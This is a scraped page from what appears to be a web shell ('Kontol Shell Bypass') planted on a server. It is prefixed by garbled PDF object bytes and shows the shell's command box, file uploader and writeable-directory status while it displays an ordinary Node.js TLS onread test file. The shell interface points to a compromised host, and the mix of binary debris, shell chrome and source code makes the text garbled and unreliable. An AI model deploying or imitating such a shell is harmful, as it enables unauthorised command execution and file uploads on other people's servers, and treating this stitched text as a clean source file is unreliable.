%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /home/ubuntu/node-v16.18.1/test/parallel/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //home/ubuntu/node-v16.18.1/test/parallel/test-tls-onread-static-buffer.js
'use strict';
const common = require('../common');
if (!common.hasCrypto)
  common.skip('missing crypto');

const assert = require('assert');
const tls = require('tls');
const fixtures = require('../common/fixtures');

const options = {
  key: fixtures.readKey('agent2-key.pem'),
  cert: fixtures.readKey('agent2-cert.pem')
};

const smallMessage = Buffer.from('hello world');
// Used to test .pause(), so needs to be larger than the internal buffer
const largeMessage = Buffer.alloc(64 * 1024).fill('hello world');

// Test typical usage
tls.createServer(options, common.mustCall(function(socket) {
  this.close();
  socket.end(smallMessage);
})).listen(0, function() {
  let received = 0;
  const buffers = [];
  const sockBuf = Buffer.alloc(8);
  tls.connect({
    port: this.address().port,
    rejectUnauthorized: false,
    onread: {
      buffer: sockBuf,
      callback: function(nread, buf) {
        assert.strictEqual(buf, sockBuf);
        received += nread;
        buffers.push(Buffer.from(buf.slice(0, nread)));
      }
    }
  }).on('data', common.mustNotCall()).on('end', common.mustCall(() => {
    assert.strictEqual(received, smallMessage.length);
    assert.deepStrictEqual(Buffer.concat(buffers), smallMessage);
  }));
});

// Test Uint8Array support
tls.createServer(options, common.mustCall(function(socket) {
  this.close();
  socket.end(smallMessage);
})).listen(0, function() {
  let received = 0;
  let incoming = new Uint8Array(0);
  const sockBuf = new Uint8Array(8);
  tls.connect({
    port: this.address().port,
    rejectUnauthorized: false,
    onread: {
      buffer: sockBuf,
      callback: function(nread, buf) {
        assert.strictEqual(buf, sockBuf);
        received += nread;
        const newIncoming = new Uint8Array(incoming.length + nread);
        newIncoming.set(incoming);
        newIncoming.set(buf.slice(0, nread), incoming.length);
        incoming = newIncoming;
      }
    }
  }).on('data', common.mustNotCall()).on('end', common.mustCall(() => {
    assert.strictEqual(received, smallMessage.length);
    assert.deepStrictEqual(incoming, new Uint8Array(smallMessage));
  }));
});

// Test Buffer callback usage
tls.createServer(options, common.mustCall(function(socket) {
  this.close();
  socket.end(smallMessage);
})).listen(0, function() {
  let received = 0;
  const incoming = [];
  const bufPool = [ Buffer.alloc(2), Buffer.alloc(2), Buffer.alloc(2) ];
  let bufPoolIdx = -1;
  let bufPoolUsage = 0;
  tls.connect({
    port: this.address().port,
    rejectUnauthorized: false,
    onread: {
      buffer: () => {
        ++bufPoolUsage;
        bufPoolIdx = (bufPoolIdx + 1) % bufPool.length;
        return bufPool[bufPoolIdx];
      },
      callback: function(nread, buf) {
        assert.strictEqual(buf, bufPool[bufPoolIdx]);
        received += nread;
        incoming.push(Buffer.from(buf.slice(0, nread)));
      }
    }
  }).on('data', common.mustNotCall()).on('end', common.mustCall(() => {
    assert.strictEqual(received, smallMessage.length);
    assert.deepStrictEqual(Buffer.concat(incoming), smallMessage);
    assert.strictEqual(bufPoolUsage, 7);
  }));
});

// Test Uint8Array callback support
tls.createServer(options, common.mustCall(function(socket) {
  this.close();
  socket.end(smallMessage);
})).listen(0, function() {
  let received = 0;
  let incoming = new Uint8Array(0);
  const bufPool = [ new Uint8Array(2), new Uint8Array(2), new Uint8Array(2) ];
  let bufPoolIdx = -1;
  let bufPoolUsage = 0;
  tls.connect({
    port: this.address().port,
    rejectUnauthorized: false,
    onread: {
      buffer: () => {
        ++bufPoolUsage;
        bufPoolIdx = (bufPoolIdx + 1) % bufPool.length;
        return bufPool[bufPoolIdx];
      },
      callback: function(nread, buf) {
        assert.strictEqual(buf, bufPool[bufPoolIdx]);
        received += nread;
        const newIncoming = new Uint8Array(incoming.length + nread);
        newIncoming.set(incoming);
        newIncoming.set(buf.slice(0, nread), incoming.length);
        incoming = newIncoming;
      }
    }
  }).on('data', common.mustNotCall()).on('end', common.mustCall(() => {
    assert.strictEqual(received, smallMessage.length);
    assert.deepStrictEqual(incoming, new Uint8Array(smallMessage));
    assert.strictEqual(bufPoolUsage, 7);
  }));
});

// Test explicit socket pause
tls.createServer(options, common.mustCall(function(socket) {
  this.close();
  // Need larger message here to observe the pause
  socket.end(largeMessage);
})).listen(0, function() {
  let received = 0;
  const buffers = [];
  const sockBuf = Buffer.alloc(64);
  let pauseScheduled = false;
  const client = tls.connect({
    port: this.address().port,
    rejectUnauthorized: false,
    onread: {
      buffer: sockBuf,
      callback: function(nread, buf) {
        assert.strictEqual(buf, sockBuf);
        received += nread;
        buffers.push(Buffer.from(buf.slice(0, nread)));
        if (!pauseScheduled) {
          pauseScheduled = true;
          client.pause();
          setTimeout(() => {
            client.resume();
          }, 100);
        }
      }
    }
  }).on('data', common.mustNotCall()).on('end', common.mustCall(() => {
    assert.strictEqual(received, largeMessage.length);
    assert.deepStrictEqual(Buffer.concat(buffers), largeMessage);
  }));
});

// Test implicit socket pause
tls.createServer(options, common.mustCall(function(socket) {
  this.close();
  // Need larger message here to observe the pause
  socket.end(largeMessage);
})).listen(0, function() {
  let received = 0;
  const buffers = [];
  const sockBuf = Buffer.alloc(64);
  let pauseScheduled = false;
  const client = tls.connect({
    port: this.address().port,
    rejectUnauthorized: false,
    onread: {
      buffer: sockBuf,
      callback: function(nread, buf) {
        assert.strictEqual(buf, sockBuf);
        received += nread;
        buffers.push(Buffer.from(buf.slice(0, nread)));
        if (!pauseScheduled) {
          pauseScheduled = true;
          setTimeout(() => {
            client.resume();
          }, 100);
          return false;
        }
        return true;
      }
    }
  }).on('data', common.mustNotCall()).on('end', common.mustCall(() => {
    assert.strictEqual(received, largeMessage.length);
    assert.deepStrictEqual(Buffer.concat(buffers), largeMessage);
  }));
});

Kontol Shell Bypass